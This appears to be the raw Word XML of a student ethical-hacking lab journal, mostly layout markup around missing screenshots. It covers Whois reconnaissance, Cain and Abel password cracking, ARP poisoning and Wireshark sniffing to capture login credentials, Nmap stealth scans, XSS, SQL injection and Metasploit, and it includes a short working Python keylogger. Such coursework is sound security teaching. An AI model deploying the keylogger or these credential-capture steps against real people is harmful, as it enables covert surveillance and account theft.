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m78nk5cgeo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3328" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PRACTICAL  NO.1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Use Google and Whois for Reconnaissance.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0" w:lineRule="auto"/>
        <w:ind w:left="3332" w:right="350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who.is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Step1: Open the WHO.is website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154989</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5349875" cy="1736912"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone/>
            <wp:docPr id="93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46108" l="0" r="98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1736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Enter the website name and hit the “Enter button”.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35530</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3425825" cy="1428750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="93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9417" l="19462" r="22488" t="24459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Show you information about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www.prestashop.com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577796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3059113" cy="2479698"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="97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113" cy="2479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pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1240" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="104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97263" cy="4615756"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="97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263" cy="4615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4691063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3266428" cy="3634476"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="97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428" cy="3634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130205</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3639646" cy="3492886"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="9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646" cy="3492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3328" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PRACTICAL  NO.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" w:lineRule="auto"/>
        <w:ind w:left="22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2.1)  Use CryptTool to encrypt and decrypt passwords using the RC4 algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr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67425" cy="3362325"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98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22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: Using RC4.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Encryption using RC4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67425" cy="3438525"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98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Decryption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67425" cy="3371850"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98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2.2)  Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode wireless network passwords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3025430"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98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 on HASH Calculator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password to convert into hash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876925" cy="3867150"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98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the value  into the field you have converted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e.g(MD5)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43475" cy="1085850"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="98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Click on the hash and select the dictionary attack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 right click on the file and select (Add to List) and then select the Wordlist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337300" cy="3646805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99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64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all the options and start the dictionary attack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  <w:sectPr>
          <w:footerReference r:id="rId23" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1300" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="881"/>
        </w:sect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124325" cy="3771900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99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ind w:left="2880" w:right="0" w:firstLine="72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4B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="29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right="0" w:firstLine="221"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1) Using TraceRoute, ping, ifconfig, netstat Command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Type tracert command and type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www.prestashop.com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 “Enter”.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166037</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5933483" cy="4469130"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="93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83" cy="446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Ping all the IP addresses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577796</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5931209" cy="5836158"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="94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9" cy="5836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Ifconfig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57900" cy="2962275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99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Netstat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67350" cy="4248150"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="99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3.2) Perform ARP Poisoning in Windows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25368" cy="3095625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="995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 : Select sniffer on the top.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162265</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="978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 : Next </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the folder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 click </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the icon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start/stop sniffer. Select device and click on ok.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166031</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2916407" cy="3647884"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="982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407" cy="3647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 : Click on “+” icon on the top. Click on ok.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430702</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1925195" cy="3202305"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone/>
            <wp:docPr id="93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195" cy="3202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35" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1060" w:top="620" w:left="1220" w:right="1040" w:header="0" w:footer="73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 : Shows the Connected host.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77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: Select Arp at bottom.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162574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="97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38" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1280" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="109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 : Click on “+” icon at the top.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5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 : Click on start/stop ARP icon on top.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162574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="93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40" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1060" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="86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 : Poisoning the source.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5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 : Go to any website on source ip address.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162574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5923788" cy="3189732"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="973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788" cy="3189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43" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="280" w:top="680" w:left="1220" w:right="10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 : Go </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the 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in the cain &amp; abel and see the visited site password.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156485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="983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22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B8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Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BA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22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Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it is installed properly. Now type the below commands.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-sA (TCP ACK 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never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.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-sA -T4 scanme.nmap.org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07870"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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 (Stealth) Scan (-sS)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 scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.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-p22,113,139 scanme.nmap.org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14925" cy="1438275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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 Scan (-sF)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just the TCP FIN bit.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-sF -T4 para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5775" cy="2066925"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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Scan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(-sN)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set any bits (TCP flag header is 0)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–sN –p 22 scanme.nmap.org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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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XMAS Scan (-sX)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the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.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-sX -T4 scanme.nmap.org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19600" cy="1295400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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50" w:type="default"/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NO. 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:right="-2673" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1) Use WireShark sniffer to capture network traffic and analyze.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Install and open WireShark .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="93" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="4176" w:firstLine="0"/>
        <w:jc w:val="lef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40" w:top="680" w:left="1220" w:right="1040" w:header="720" w:footer="720"/>
          <w:cols w:equalWidth="0" w:num="2">
            <w:col w:space="708" w:w="4636"/>
            <w:col w:space="0" w:w="463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75307" cy="2681445"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="94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307" cy="268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Go to Capture tab and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select the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152288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5002213" cy="2464623"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="981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213" cy="2464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40" w:top="680" w:left="1220" w:right="10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In Capture interface, Select Local Area Connection and click on start.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4792663" cy="1330868"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="992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63" cy="1330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The source, Destination and protocols of the packets in the LAN network are displayed.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161925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4791075" cy="2574309"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="94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74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4695825" cy="2530818"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="98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30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Open a website in a new window and enter the user id and password. Register if needed.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162548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3979175" cy="2571750"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapNone/>
            <wp:docPr id="97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17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  <w:sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1320" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="1046"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: Enter the credentials and then sign in.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285194</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4472412" cy="2895600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="95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412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The wireshark tool will keep recording the packets.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161925</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4476750" cy="2205724"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr id="96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5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8: Select filter as http to make the search easier and click on apply.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331232</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4315340" cy="2325756"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="0" distT="0" distL="0" distR="0"/>
            <wp:docPr id="97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340" cy="2325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166" w:lineRule="auto"/>
        <w:ind w:left="221" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1320" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="1046"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 9: Now stop the tool to stop recording.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370666</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4312268" cy="2324100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="95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268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0" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="920" w:top="620" w:left="1220" w:right="1040" w:header="0" w:footer="73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Find the post methods for username and passwords.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4563971" cy="2459756"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="94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971" cy="2459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11: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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see the email-id and password that you used to log in.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152400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4524375" cy="750455"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" distT="0"/>
            <wp:docPr id="97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50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0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="12700"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9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6242619" y="12901140"/>
                          <a:ext cx="59810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A3A3A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0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="0" cy="12700"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapNone/>
                <wp:docPr id="917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NEMESIS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40" w:top="680" w:left="1220" w:right="1040" w:header="0" w:footer="73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06128" cy="1974055"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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128" cy="197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before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:left="2160" w:right="4258" w:firstLine="720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35">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="106" w:line="223" w:lineRule="auto"/>
        <w:ind w:right="4258" w:firstLine="221"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: Simulate persistent Cross Site Scripting attack.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76925" cy="3895725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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76925" cy="3676650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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13D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="256" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="221"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AIM: Perform SQL injection attack.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272666" cy="1863520"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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2666" cy="186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DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142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278313" cy="429194"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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313" cy="42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259263" cy="1306926"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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263" cy="130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TABLES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145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297363" cy="472162"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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363" cy="47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287838" cy="2188352"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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838" cy="218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962400" cy="1057963"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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389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COLUMNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A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002088" cy="375992"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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3"/>
                    <a:srcRect b="0" l="0" r="0" t="61256"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4002088" cy="375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041828" cy="1016893"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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828" cy="101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078288" cy="1571569"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="96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288" cy="157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46786" cy="2113012"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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6786" cy="211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25913" cy="1695040"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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913" cy="169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83063" cy="1332186"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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063" cy="133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64013" cy="2141682"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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013" cy="2141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64013" cy="1558189"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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013" cy="155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1" w:type="default"/>
          <w:type w:val="nextPage"/>
          <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
          <w:pgMar w:bottom="1280" w:top="680" w:left="1220" w:right="1040" w:header="0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1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simple keylogger using python</w:t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-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pynput.keyboard import Key, Listener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logging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if no name it gets into an empty string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log_dir = ""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is a basic logging function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logging.basicConfig(filename=(log_dir+"key_log.txt"), level=logging.DEBUG, format='%(asctime)s:%(message)s:')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is from the library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on_press(key):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logging.info(str(key))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says, listener is on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Listener(on_press=on_press) as listener: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listener.join()</w:t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-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805556" cy="2875752"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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556" cy="287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Using Metasploit to exploit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open metasploit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exploit to attack the host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exploit and add the exploit to the victim’s PC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81675" cy="4905375"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9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4" w:type="default"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="620" w:left="1220" w:right="1040" w:header="0" w:footer="88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4824413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4824413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4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8859838</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3347085" cy="337185"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="91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451921" y="4009870"/>
                        <a:ext cx="3337560" cy="327660"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="327660" w="3337560">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="327660"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="3337560" y="327660"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="33375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8859838</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="3347085" cy="337185"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="915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7085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br w:type="textWrapping"/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9360" w:right="0" w:firstLine="619.999999999998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19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1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7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951031" y="3643475"/>
                        <a:ext cx="2339340" cy="273050"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="273050" w="2339340">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="273050"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2339340" y="273050"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23393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886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28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28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3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944999" y="3667288"/>
                        <a:ext cx="2351405" cy="225425"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="225425" w="2351405">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="225425"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2351405" y="225425"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23514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3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0930" cy="234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8827453</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1454150" cy="187325"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="930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8827453</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1454150" cy="187325"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="930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408555" cy="247015"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="9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21186" y="3661255"/>
                        <a:ext cx="2399030" cy="237490"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="237490" w="2399030">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="237490"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2399030" y="237490"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23990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408555" cy="247015"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="913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8555" cy="247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8970328</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1454150" cy="187325"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="920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8970328</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1454150" cy="187325"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="920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36800" cy="211455"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="925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957064" y="3679035"/>
                        <a:ext cx="2327275" cy="201930"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="201930" w="2327275">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="201930"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2327275" y="201930"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23272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36800" cy="211455"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="92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6800" cy="211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sz w:val="2"/>
        <w:szCs w:val="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sz w:val="9"/>
        <w:szCs w:val="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2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25370" cy="223520"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="924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962779" y="3673003"/>
                        <a:ext cx="2315845" cy="213995"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="213995" w="2315845">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="213995"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2315845" y="213995"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23158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25370" cy="223520"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="924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5370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sz w:val="6"/>
        <w:szCs w:val="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4681538</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9056053</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1454150" cy="187325"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="926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4681538</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>9056053</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1454150" cy="187325"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="926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2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944999" y="3667288"/>
                        <a:ext cx="2351405" cy="225425"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="225425" w="2351405">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="225425"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="2351405" y="225425"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="23514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0930" cy="234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sz w:val="2"/>
        <w:szCs w:val="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527300" cy="199390"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="916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61814" y="3685068"/>
                        <a:ext cx="2517775" cy="189865"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
                          <a:path extrusionOk="0" h="189865" w="2517775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2517775" y="189865"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="25177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527300" cy="199390"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="916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730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21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21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9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951031" y="3643475"/>
                        <a:ext cx="2339340" cy="273050"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:rect b="b" l="l" r="r" t="t"/>
                        <a:pathLst>
